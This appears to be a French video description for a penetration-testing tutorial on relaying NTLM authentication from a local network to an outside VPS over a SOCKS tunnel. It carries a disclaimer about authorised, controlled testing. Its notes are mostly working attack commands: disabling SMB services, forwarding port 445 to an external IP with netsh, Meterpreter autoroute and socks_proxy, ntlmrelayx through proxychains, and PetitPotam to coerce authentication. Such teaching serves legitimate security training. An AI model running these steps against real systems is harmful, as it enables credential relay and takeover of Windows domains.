Vidéo en français expliquant comment mettre en place un relai d'authentification NTLM par le biais d'une machine située à l'extérieur du réseau local, en établissant un tunnel sur le protocole SOCKS.
Cette vidéo est à vocation instructive.
La technique présentée ici est effectuée au sein d'un environnement contrôlé dédié à cet effet.
Un test d'intrusion, ou pentest, doit toujours s'effectuer avec l'accord du client et dans un périmètre défini au préalable.
-----------------------------------------------------------------------------------
Quelques infos sur le pivoting et le protocole SOCKS :
- learn.microsoft.com/en-us/ope...
- learn.microsoft.com/fr-fr/win...
-----------------------------------------------------------------------------------
Mon cours GRATUIT complet sur l'authentification sous Windows :
- • AUTHENTIFICATION SOUS ...
- docs.lestutosdeprocessus.fr/A...
- learn.microsoft.com/fr-fr/win...
-----------------------------------------------------------------------------------
Quelques infos sur Petit Potam :
- learn.microsoft.com/en-us/ope...
- github.com/topotam/PetitPotam
-----------------------------------------------------------------------------------
MES NOTES COMPLETES :
Sous Windows :
On peut stopper les services LanManServer pour stopper le SMB (modifié)
il faut stopper et mettre en disabled les services :
```
netlogon
lanmanserver
lanmanworkstation
Si les 2 derniers services n'existe pas, passer leur statut "start" à "4" dans le registre :
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanworkstation
```
ensuite on reboot la machine
on se reconnecte dessus et on reprend un meterpreter en system sur la machine
on forward son port 445 vers notre kali
```
netsh interface portproxy add v4tov4 listenaddress=172.16.1.100 listenport=445 connectaddress=51.38.35.62 connectport=4450
```
On génère un meterpreter et on récupère la connexion dans notre VPS
On ajoute une route pour faire transiter les paquets vers le lan
```
run autoroute -s 172.16.1.0/24
```
On utilise le module proxy_socks dans metasploit pour router les paquets sur le lan au travers d'un tunnel proxy :
```
use auxiliary/server/socks_proxy
set srvport 8090
set version 4a
run
```
On modifie notre config proxychains pour passer par le tunnel et on monte un relai ntlm :
```
proxychains python3 ntlmrelayx.py -t 172.16.1.1 -ts --no-http-server --smb-port 4450 -debug
```
Ensuite on peut trigger une authentification via proxychains vers la machine de contrôle :
```
proxychains python3 PetitPotam.py 172.16.1.100 172.16.1.2
```
Et voilà !
-----------------------------------------------------------------------------------
Le lien de mon blog :
processus.site
Le lien pour rejoindre le serveur Discord :
/ discord
3 фев 2023